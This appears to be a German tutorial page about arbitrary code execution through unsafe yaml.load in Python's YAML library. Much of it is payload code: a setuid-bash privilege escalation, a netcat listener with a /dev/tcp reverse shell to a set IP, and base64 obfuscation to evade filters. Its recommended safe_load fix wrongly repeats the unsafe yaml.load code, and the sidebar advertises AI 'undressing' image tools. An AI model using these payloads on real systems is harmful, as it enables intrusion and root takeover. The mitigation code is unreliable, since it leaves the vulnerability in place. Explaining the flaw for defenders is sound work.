Seien Sie vorsichtig bei der Verwendung von YAML in Python! Möglicherweise bestehen Sicherheitslücken-Python-Tutorial-php.cn

Heim

Backend-Entwicklung

Python-Tutorial

Seien Sie vorsichtig bei der Verwendung von YAML in Python! Möglicherweise bestehen Sicherheitslücken

Patricia Arquette

Jan 03, 2025 pm 10:15 PM

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

Es wurden Schwachstellen in der YAML-Bibliothek (YAML Ain't Markup Language) in Python festgestellt, die unter bestimmten Bedingungen die Ausführung beliebiger Befehle ermöglicht. Die Sicherheitslücke entsteht durch die Verwendung der Funktion yaml.load ohne Angabe eines sicheren Ladeprogramms. Standardmäßig kann yaml.load beliebige Python-Objekte ausführen, wodurch eine Angriffsfläche für bösartige Payloads entsteht.

Ausbeutung durch willkürliche Befehlsausführung

Das grundlegende Risiko liegt im Deserialisierungsprozess. Wenn ein YAML-Dokument eine schädliche Nutzlast enthält, verarbeitet yaml.load die eingebetteten Anweisungen, was möglicherweise zur Codeausführung führt. Betrachten Sie beispielsweise den folgenden Ausschnitt:

import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage

Hier analysiert die Funktion yaml.load example.yml ohne Einschränkungen, wodurch es anfällig wird, wenn der YAML-Inhalt unsichere Anweisungen enthält. Eine typische Exploit-Nutzlast kann so gestaltet werden, dass sie beliebige Systembefehle ausführt.

Beispielnutzlast

import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)

Jeder dieser Aufrufe verarbeitet die Nutzlast, was zur Erstellung einer privilegierten ausführbaren Datei in /tmp/bash führt. Diese Binärdatei kann dann mit erhöhten Rechten ausgeführt werden:

/tmp/bash -p

Dies zeigt das Potenzial für eine Rechteausweitung, wenn die Schwachstelle auf einem System mit falsch konfigurierten Berechtigungen oder anderen Schwachstellen ausgenutzt wird.

Umgekehrte Shell-Ausbeutung

Ein besonders heimtückischer Anwendungsfall ist die Ausnutzung der Schwachstelle für eine Reverse-Shell. Dies ermöglicht Angreifern den Fernzugriff auf den Zielrechner. Der Prozess umfasst das Starten eines Listeners auf dem Computer des Angreifers und das Erstellen eines YAML-Dokuments, das die umgekehrte Verbindung herstellen soll.

Initiieren Sie auf dem Computer des Angreifers einen Netcat-Listener:

nc -lvnp 1234

Führen Sie auf dem Zielsystem das folgende Python-Skript als Root aus:

import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell

Diese Nutzlast weist den Zielcomputer an, sich wieder mit dem Listener des Angreifers zu verbinden und stellt so eine vollständig interaktive Shell mit den Berechtigungen des ausführenden Prozesses bereit.

Base64-Codierung zur Verschleierung

Um grundlegende Sicherheitskontrollen oder Filter zu umgehen, kann die Nutzlast Base64-codiert werden. Diese Methode fügt eine Verschleierungsebene hinzu und entgeht möglicherweise der Erkennung durch statische Analysetools.

Beispiel

from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)

Schadensbegrenzungstechniken

Fachkräfte müssen strenge Codierungspraktiken anwenden, um solche Schwachstellen zu beseitigen. Zu den empfohlenen Abhilfemaßnahmen gehören:

Verwendung von Safe Loadern: Ersetzen Sie yaml.load durch yaml.safe_load, was die Ausführung beliebiger Objekte verhindert.
```
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
```
Einschränkung von Eingabequellen: Stellen Sie sicher, dass YAML-Eingaben bereinigt sind und nur aus vertrauenswürdigen Quellen stammen.
Anwenden der statischen Analyse: Verwenden Sie Tools, um Codebasen auf unsichere yaml.load-Aufrufe zu scannen.
Environment Hardening: Beschränken Sie die Systemberechtigungen, um die Auswirkungen der Ausnutzung zu minimieren. Beispielsweise schränkt die Verwendung von Containerumgebungen die Möglichkeiten eines Angreifers zur Eskalation von Berechtigungen ein.

Das Standardverhalten der YAML-Bibliothek veranschaulicht die Risiken, die mit der Deserialisierung in dynamisch typisierten Sprachen wie Python verbunden sind. Das Ausnutzen dieser Schwachstelle erfordert nur minimale technische Raffinesse, was sie zu einem Problem mit hoher Priorität für die sichere Anwendungsentwicklung macht. Um diese Risiken wirksam zu mindern, ist die Einführung sicherer Codierungspraktiken zusammen mit robuster Eingabevalidierung und Laufzeitschutz unerlässlich.

Das obige ist der detaillierte Inhalt vonSeien Sie vorsichtig bei der Verwendung von YAML in Python! Möglicherweise bestehen Sicherheitslücken. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme

Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Verwandter Artikel

Python lernen: Ist 2 Stunden tägliches Studium ausreichend?Apr 18, 2025 am 12:22 AM

Ist es genug, um Python für zwei Stunden am Tag zu lernen? Es hängt von Ihren Zielen und Lernmethoden ab. 1) Entwickeln Sie einen klaren Lernplan, 2) Wählen Sie geeignete Lernressourcen und -methoden aus, 3) praktizieren und prüfen und konsolidieren Sie praktische Praxis und Überprüfung und konsolidieren Sie und Sie können die Grundkenntnisse und die erweiterten Funktionen von Python während dieser Zeit nach und nach beherrschen.

Python für die Webentwicklung: SchlüsselanwendungenApr 18, 2025 am 12:20 AM

Zu den wichtigsten Anwendungen von Python in der Webentwicklung gehören die Verwendung von Django- und Flask -Frameworks, API -Entwicklung, Datenanalyse und Visualisierung, maschinelles Lernen und KI sowie Leistungsoptimierung. 1. Django und Flask Framework: Django eignet sich für die schnelle Entwicklung komplexer Anwendungen, und Flask eignet sich für kleine oder hochmobile Projekte. 2. API -Entwicklung: Verwenden Sie Flask oder Djangorestframework, um RESTFUFFUPI zu erstellen. 3. Datenanalyse und Visualisierung: Verwenden Sie Python, um Daten zu verarbeiten und über die Webschnittstelle anzuzeigen. 4. Maschinelles Lernen und KI: Python wird verwendet, um intelligente Webanwendungen zu erstellen. 5. Leistungsoptimierung: optimiert durch asynchrones Programmieren, Caching und Code

Python vs. C: Erforschung von Leistung und Effizienz erforschenApr 18, 2025 am 12:20 AM

Python ist in der Entwicklungseffizienz besser als C, aber C ist in der Ausführungsleistung höher. 1. Pythons prägnante Syntax und reiche Bibliotheken verbessern die Entwicklungseffizienz. 2. Die Kompilierungsmerkmale von Compilation und die Hardwarekontrolle verbessern die Ausführungsleistung. Bei einer Auswahl müssen Sie die Entwicklungsgeschwindigkeit und die Ausführungseffizienz basierend auf den Projektanforderungen abwägen.

Python in Aktion: Beispiele in realer WeltApr 18, 2025 am 12:18 AM

Zu den realen Anwendungen von Python gehören Datenanalysen, Webentwicklung, künstliche Intelligenz und Automatisierung. 1) In der Datenanalyse verwendet Python Pandas und Matplotlib, um Daten zu verarbeiten und zu visualisieren. 2) In der Webentwicklung vereinfachen Django und Flask Frameworks die Erstellung von Webanwendungen. 3) Auf dem Gebiet der künstlichen Intelligenz werden Tensorflow und Pytorch verwendet, um Modelle zu bauen und zu trainieren. 4) In Bezug auf die Automatisierung können Python -Skripte für Aufgaben wie das Kopieren von Dateien verwendet werden.

Pythons Hauptnutzung: ein umfassender ÜberblickApr 18, 2025 am 12:18 AM

Python wird häufig in den Bereichen Data Science, Web Development und Automation Scripting verwendet. 1) In der Datenwissenschaft vereinfacht Python die Datenverarbeitung und -analyse durch Bibliotheken wie Numpy und Pandas. 2) In der Webentwicklung ermöglichen die Django- und Flask -Frameworks Entwicklern, Anwendungen schnell zu erstellen. 3) In automatisierten Skripten machen Pythons Einfachheit und Standardbibliothek es ideal.

Der Hauptzweck von Python: Flexibilität und BenutzerfreundlichkeitApr 17, 2025 am 12:14 AM

Die Flexibilität von Python spiegelt sich in Multi-Paradigm-Unterstützung und dynamischen Typsystemen wider, während eine einfache Syntax und eine reichhaltige Standardbibliothek stammt. 1. Flexibilität: Unterstützt objektorientierte, funktionale und prozedurale Programmierung und dynamische Typsysteme verbessern die Entwicklungseffizienz. 2. Benutzerfreundlichkeit: Die Grammatik liegt nahe an der natürlichen Sprache, die Standardbibliothek deckt eine breite Palette von Funktionen ab und vereinfacht den Entwicklungsprozess.

Python: Die Kraft der vielseitigen ProgrammierungApr 17, 2025 am 12:09 AM

Python ist für seine Einfachheit und Kraft sehr beliebt, geeignet für alle Anforderungen von Anfängern bis hin zu fortgeschrittenen Entwicklern. Seine Vielseitigkeit spiegelt sich in: 1) leicht zu erlernen und benutzten, einfachen Syntax; 2) Reiche Bibliotheken und Frameworks wie Numpy, Pandas usw.; 3) plattformübergreifende Unterstützung, die auf einer Vielzahl von Betriebssystemen betrieben werden kann; 4) Geeignet für Skript- und Automatisierungsaufgaben zur Verbesserung der Arbeitseffizienz.

Python in 2 Stunden am Tag lernen: Ein praktischer LeitfadenApr 17, 2025 am 12:05 AM

Ja, lernen Sie Python in zwei Stunden am Tag. 1. Entwickeln Sie einen angemessenen Studienplan, 2. Wählen Sie die richtigen Lernressourcen aus, 3. Konsolidieren Sie das durch die Praxis erlernte Wissen. Diese Schritte können Ihnen helfen, Python in kurzer Zeit zu meistern.

See all articles

Heiße KI -Werkzeuge

Undresser.AI Undress

KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover

Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool

Ausziehbilder kostenlos

Clothoff.io

KI-Kleiderentferner

AI Hentai Generator

Erstellen Sie kostenlos Ai Hentai.

Heißer Artikel

R.E.P.O. Energiekristalle erklärten und was sie tun (gelber Kristall)

1 Monate vorBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Beste grafische Einstellungen

1 Monate vorBy尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle -Lösung

3 Wochen vorByDDD

Was ist neu in Windows 11 KB5054979 und wie Sie Update -Probleme beheben

2 Wochen vorByDDD

Will R.E.P.O. Crossplay haben?

1 Monate vorBy尊渡假赌尊渡假赌尊渡假赌

Heiße Werkzeuge

VSCode Windows 64-Bit-Download

Ein kostenloser und leistungsstarker IDE-Editor von Microsoft

MantisBT

Mantis ist ein einfach zu implementierendes webbasiertes Tool zur Fehlerverfolgung, das die Fehlerverfolgung von Produkten unterstützen soll. Es erfordert PHP, MySQL und einen Webserver. Schauen Sie sich unsere Demo- und Hosting-Services an.

ZendStudio 13.5.1 Mac

Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver Mac

Visuelle Webentwicklungstools

MinGW – Minimalistisches GNU für Windows

Dieses Projekt wird derzeit auf osdn.net/projects/mingw migriert. Sie können uns dort weiterhin folgen. MinGW: Eine native Windows-Portierung der GNU Compiler Collection (GCC), frei verteilbare Importbibliotheken und Header-Dateien zum Erstellen nativer Windows-Anwendungen, einschließlich Erweiterungen der MSVC-Laufzeit zur Unterstützung der C99-Funktionalität. Die gesamte MinGW-Software kann auf 64-Bit-Windows-Plattformen ausgeführt werden.

Heiße Themen

Wo ist der Login-Zugang für Gmail-E-Mail?

7549

CakePHP-Tutorial

1382

Wie lautet das Format des Kontonamens von Steam?

Win11 -Aktivierungsschlüssel dauerhaft

NYT -Verbindungen Hinweise und Antworten